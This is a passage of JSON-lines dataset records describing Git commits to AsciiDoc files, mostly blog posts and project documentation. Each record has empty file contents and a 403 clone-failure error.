{"commit":"d6c5507049757735cc88659f919a5a5d12092da6","subject":"docs: add master permanent failure recovery workflow","message":"docs: add master permanent failure recovery workflow\n\nWhile testing this I filed KUDU-1620; this wasn't an issue in\nmaster_failover-itest because it (obviously) can't do any DNS aliasing.\n\nChange-Id: I49d63efa76166bc548db75b0e43ae317c49f9e95\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4436\nReviewed-by: David Ribeiro Alves <78b9f953b197533e9b51c860b080869056433b48@apache.org>\nTested-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eefabec2525f0912ba526a5730f0bf611a0d1b72","subject":"Update 2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","message":"Update 
2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","new_file":"_posts\/2012-12-05-Menggunakan-WinRAR-di-VPS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6121248c4f1043d50e31dffc848d75852ff82abb","subject":"Update 2016-07-21-Contributing-to-Chronicle.adoc","message":"Update 2016-07-21-Contributing-to-Chronicle.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-07-21-Contributing-to-Chronicle.adoc","new_file":"_posts\/2016-07-21-Contributing-to-Chronicle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57e92d92cbd760909d7304a84472565a7cea2535","subject":"Update 2015-5-10-uG.adoc","message":"Update 2015-5-10-uG.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-5-10-uG.adoc","new_file":"_posts\/2015-5-10-uG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ab83b2e2b0c1ec472b27450b993501951d68977","subject":"Document new GL window providers","message":"Document new GL window providers\n","repos":"qgears\/opensource-utils,qgears\/opensource-utils,qgears\/opensource-utils,qgears\/opensource-utils,qgears\/opensource-utils","old_file":"commons\/hu.qgears.opengl.commons\/README.asciidoc","new_file":"commons\/hu.qgears.opengl.commons\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qgears\/opensource-utils.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f8f13540d33a381956dd446fd6614bfb0f08bf6a","subject":"Update 2015-11-21-Extraer-y-sustituir-partes-de-rutas.adoc","message":"Update 2015-11-21-Extraer-y-sustituir-partes-de-rutas.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-21-Extraer-y-sustituir-partes-de-rutas.adoc","new_file":"_posts\/2015-11-21-Extraer-y-sustituir-partes-de-rutas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f92a979ce9f61502cf2c12db7b31a25f3a2c3ba7","subject":"Update 2016-10-26-Post-3.adoc","message":"Update 2016-10-26-Post-3.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2016-10-26-Post-3.adoc","new_file":"_posts\/2016-10-26-Post-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f3edaa62ba08ea2cb91dd50a428df408d92328f","subject":"Update 2016-11-07-Monday.adoc","message":"Update 2016-11-07-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Monday.adoc","new_file":"_posts\/2016-11-07-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf9cfa749cdb71b76943040ba41f88fd353e0e44","subject":"Update 2015-02-24-test.adoc","message":"Update 2015-02-24-test.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-test.adoc","new_file":"_posts\/2015-02-24-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a71f2bcf67ad0fb127b42ea2377253a2c7aa3fa6","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3f6e74a156123a08c18cb7182a4362cb39bb654","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ae9d0523d7960d6e1cb4e9a484a259cfddaec0a","subject":"Add README to custom AWS sample","message":"Add README to custom AWS sample\n","repos":"olegz\/spring-cloud-function,olegz\/spring-cloud-function,olegz\/spring-cloud-function,olegz\/spring-cloud-function,olegz\/spring-cloud-function","old_file":"spring-cloud-function-samples\/function-sample-aws-custom\/README.adoc","new_file":"spring-cloud-function-samples\/function-sample-aws-custom\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/olegz\/spring-cloud-function.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5a1becb5defd142c3a23f2ebb4b5e98d72db4e4a","subject":"y2b create post ROCCAT Kone XTD Gaming Mouse Unboxing \\u0026 Overview","message":"y2b create post ROCCAT Kone XTD Gaming Mouse Unboxing \\u0026 
Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-12-ROCCAT-Kone-XTD-Gaming-Mouse-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-04-12-ROCCAT-Kone-XTD-Gaming-Mouse-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0573c399a7abe652e77a31cf804975abdd689f3b","subject":"y2b create post Unboxing an Xbox One in a 24 hour diner at 3AM","message":"y2b create post Unboxing an Xbox One in a 24 hour diner at 3AM","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-11-22-Unboxing-an-Xbox-One-in-a-24-hour-diner-at-3AM.adoc","new_file":"_posts\/2013-11-22-Unboxing-an-Xbox-One-in-a-24-hour-diner-at-3AM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d8b44d44d88f6dec27ed6b98591265d57003cd7","subject":"Update 2015-12-04-How-to-Compile-Kubernetes-for-Raspberry-Pi-ARM.adoc","message":"Update 2015-12-04-How-to-Compile-Kubernetes-for-Raspberry-Pi-ARM.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-12-04-How-to-Compile-Kubernetes-for-Raspberry-Pi-ARM.adoc","new_file":"_posts\/2015-12-04-How-to-Compile-Kubernetes-for-Raspberry-Pi-ARM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"944ea4a5ab5710f3099a3f4fe81b5f3fca5bc152","subject":"Update 2016-02-25-Simple-Music-Visualizer-inspired-by-Monstercat.adoc","message":"Update 2016-02-25-Simple-Music-Visualizer-inspired-by-Monstercat.adoc","repos":"Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io,Ugotsta\/Ugotsta.github.io","old_file":"_posts\/2016-02-25-Simple-Music-Visualizer-inspired-by-Monstercat.adoc","new_file":"_posts\/2016-02-25-Simple-Music-Visualizer-inspired-by-Monstercat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ugotsta\/Ugotsta.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae2b98cb4613bf35a3982201910d05812470831b","subject":"Update 1993-12-12-goodgood-study.adoc","message":"Update 1993-12-12-goodgood-study.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-12-12-goodgood-study.adoc","new_file":"_posts\/1993-12-12-goodgood-study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78ffc406bb5cbf73ffbee43cf0fae4c042711459","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 
2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37ae65d38ae7228e802f7d84023481f24650bf76","subject":"Update 2015-03-21-GoLang-Notes.adoc","message":"Update 2015-03-21-GoLang-Notes.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-03-21-GoLang-Notes.adoc","new_file":"_posts\/2015-03-21-GoLang-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90c483470c1fea42eca12c77cf0d0f376c262cbc","subject":"Update doc version","message":"Update doc version\n","repos":"elastic\/elasticsearch-hadoop,xjrk58\/elasticsearch-hadoop,elastic\/elasticsearch-hadoop,takezoe\/elasticsearch-hadoop","old_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_file":"docs\/src\/reference\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xjrk58\/elasticsearch-hadoop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"14832141ae43e4e1db1541f055b63fe65b77b872","subject":"Update 2016-07-29-Nodejs-C-D-N.adoc","message":"Update 2016-07-29-Nodejs-C-D-N.adoc","repos":"gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io,gongxiancao\/gongxiancao.github.io","old_file":"_posts\/2016-07-29-Nodejs-C-D-N.adoc","new_file":"_posts\/2016-07-29-Nodejs-C-D-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gongxiancao\/gongxiancao.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0774d88a8dd74e5264d892d7721c795f1dba4e8a","subject":"Added 01\/2019 Newsletter","message":"Added 01\/2019 Newsletter\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-06-03-debezium-newsletter-01-2019.adoc","new_file":"blog\/2019-06-03-debezium-newsletter-01-2019.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75f683bdb1f59c4c8fe35261035a9193c86c6a39","subject":"Update 2018-02-23-measuring-performance-of-website.adoc","message":"Update 2018-02-23-measuring-performance-of-website.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-measuring-performance-of-website.adoc","new_file":"_posts\/2018-02-23-measuring-performance-of-website.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3e22047ee690dbc7ea73b4ae9bbc971edb551fa","subject":"Update 2017-11-05-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","message":"Update 2017-11-05-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-11-05-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","new_file":"_posts\/2017-11-05-Using-ediff-with-Visual-Studio-Team-Foundation-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"feaec99b055517355f12ac5476509b4ca76f3215","subject":"Update 2017-08-24-Z-Flex-Deck-Review-for-all-levels-of-experience.adoc","message":"Update 2017-08-24-Z-Flex-Deck-Review-for-all-levels-of-experience.adoc","repos":"joelcbailey\/joelcbailey.github.io,joelcbailey\/joelcbailey.github.io,joelcbailey\/joelcbailey.github.io,joelcbailey\/joelcbailey.github.io","old_file":"_posts\/2017-08-24-Z-Flex-Deck-Review-for-all-levels-of-experience.adoc","new_file":"_posts\/2017-08-24-Z-Flex-Deck-Review-for-all-levels-of-experience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joelcbailey\/joelcbailey.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1be6bd7f4e35cd9cd67af0944b069ce267fb1755","subject":"y2b create post 3 Cool Gadgets Under $35","message":"y2b create post 3 Cool Gadgets Under $35","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-25-3-Cool-Gadgets-Under-35.adoc","new_file":"_posts\/2017-04-25-3-Cool-Gadgets-Under-35.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbe5e2ca3fe578349e4a288835492aff8fb75374","subject":"Hawkular BTM 0.1.0 release announcement","message":"Hawkular BTM 0.1.0 release 
announcement\n","repos":"ppalaga\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jotak\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lzoubek\/hawkular.github.io,metlos\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jsanda\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,ppalaga\/hawkular.github.io,tsegismont\/hawkular.github.io,jpkrohling\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jpkrohling\/hawkular.github.io,ppalaga\/hawkular.github.io,lzoubek\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,metlos\/hawkular.github.io,tsegismont\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,hawkular\/hawkular.github.io,lzoubek\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/07\/01\/hawkular-btm-0-1-0-released.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/07\/01\/hawkular-btm-0-1-0-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75c5d7b32d72c826bfec1bf5fb93b5f581f4b853","subject":"Update 2015-03-15-last-one-there.adoc","message":"Update 2015-03-15-last-one-there.adoc","repos":"timofei7\/onroutenow,timofei7\/onroutenow,timofei7\/onroutenow","old_file":"_posts\/2015-03-15-last-one-there.adoc","new_file":"_posts\/2015-03-15-last-one-there.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/timofei7\/onroutenow.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2150476ef85cb70160c78715207f6825032c344d","subject":"Update 2018-03-27-Test.adoc","message":"Update 2018-03-27-Test.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-03-27-Test.adoc","new_file":"_posts\/2018-03-27-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53d9490b169c7a3d2764e8c449783e08c4c37de2","subject":"NEW testing scenarios for authorization system tests","message":"NEW testing scenarios for authorization system 
tests\n","repos":"EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse","old_file":"documentation\/design_docs\/systemtests\/authorization-tests\/scenarios.adoc","new_file":"documentation\/design_docs\/systemtests\/authorization-tests\/scenarios.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2b760e53465bd5410970cf5b1e394cc7a48c27e","subject":"Update 2015-09-20-Flask-learning.adoc","message":"Update 2015-09-20-Flask-learning.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Flask-learning.adoc","new_file":"_posts\/2015-09-20-Flask-learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9f74715a33038d0461af467a2e83bb13671ea1c3","subject":"Update 2016-02-29-multithreading.adoc","message":"Update 2016-02-29-multithreading.adoc","repos":"chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io,chbailly\/chbailly.github.io","old_file":"_posts\/2016-02-29-multithreading.adoc","new_file":"_posts\/2016-02-29-multithreading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chbailly\/chbailly.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e3186566f283257cb81bfc6014a84ed5df4efcb","subject":"Initial sketch of topics to discuss when making performance tuning recommendations to users.","message":"Initial sketch of topics to discuss when making performance tuning\nrecommendations to users.\n\nbk: 55a51eb0KaiejiqRoIKji_04IcmKTQ","repos":"bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper,bitkeeper-scm\/bitkeeper","old_file":"src\/Notes\/PERF-TUNING.adoc","new_file":"src\/Notes\/PERF-TUNING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bitkeeper-scm\/bitkeeper.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a50ec6090820a6577e138c566cb73a33f59b62b8","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-and-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae8a9994819ea3c28af3a9edff6669146cbb0a95","subject":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","message":"Update 2016-04-15-S-Q-L-Injection-Intermedio.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_file":"_posts\/2016-04-15-S-Q-L-Injection-Intermedio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b747ab277d0fea782a6545b9bcb694494bbbc49","subject":"Update 2017-06-03-Vue20-ElementUI-Pge-Helper.adoc","message":"Update 2017-06-03-Vue20-ElementUI-Pge-Helper.adoc","repos":"tjfy1992\/tjfy1992.github.io,tjfy1992\/tjfy1992.github.io,tjfy1992\/tjfy1992.github.io,tjfy1992\/tjfy1992.github.io","old_file":"_posts\/2017-06-03-Vue20-ElementUI-Pge-Helper.adoc","new_file":"_posts\/2017-06-03-Vue20-ElementUI-Pge-Helper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tjfy1992\/tjfy1992.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb7e050ce293bd676873494256d04d43a9acf9a7","subject":"job #12330 drafting xtUML spec","message":"job #12330 drafting xtUML spec\n","repos":"xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12330_textual_xtuml.adoc","new_file":"doc-bridgepoint\/notes\/12330_textual_xtuml.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cortlandstarrett\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"175c5a15815a5a44cba660efd4a86c91f632b780","subject":"doc: implementers: fix link to modules list","message":"doc: implementers: fix link to modules list\n\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nReviewed-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nSigned-off-by: Mike Holmes 
